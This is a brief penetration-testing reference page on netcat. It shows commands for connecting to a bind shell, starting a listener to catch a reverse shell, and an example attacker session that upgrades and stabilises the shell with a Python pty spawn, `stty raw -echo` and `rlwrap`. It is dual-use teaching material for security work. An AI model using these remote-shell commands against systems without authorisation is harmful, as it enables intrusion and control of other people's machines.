Netcat

Netcat is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Kali’s nc is the “classic” netcat, written by Hobbit. It lacks many features found in netcat-openbsd.

Netcat bind shell

To obtain a bind shell on a target where there is already a listener waiting on a chosen port of the target:

# nc <target-ip> <chosen-port>

Netcat reverse shell

Starting a netcat listener on Linux for receiving from a reverse shell of the target:

# nc -lvnp <port-number>

Stabilising netcat shells

Stabilise a netcat shell on Linux systems:

  • Spawn a better featured bash shell

  • Export to have access to term commands such as clear

  • Background the shell with Ctrl+Z. Back in our own terminal, use stty raw -echo; fg to turn off terminal echo (which gives access to tab autocompletes, the arrow keys, and Ctrl+C to kill processes) and foreground the shell again.

adversary@kali:~# nc -lvnp <port-number>
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::<port-number>
Ncat: Listening on 0.0.0.0:<port-number>
Ncat: Connection from <target IP address>.
Ncat: Connection from <target IP address>:<target port-number>.
python -c 'import pty;pty.spawn("/bin/bash")'
shell@linux:~$ export TERM=xterm
shell@linux:~$ ^Z
[1]+ Stopped        nc -lvnp <port-number>
adversary@kali:~# stty raw -echo; fg
nc -lvnp <port-number>

shell@linux:~$ whoami
shell

If the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.

For Windows shells, rlwrap can give access to history, tab autocompletion and the arrow keys immediately when receiving a shell, but some manual stabilisation must still be used to be able to use Ctrl+C inside the shell. rlwrap is not installed by default on Kali, so first install it with sudo apt install rlwrap.

Then use:

adversary@kali:~# rlwrap nc -lvnp <port-number>

The third way to stabilise a shell is to use a netcat shell as a stepping stone into a more fully-featured socat shell.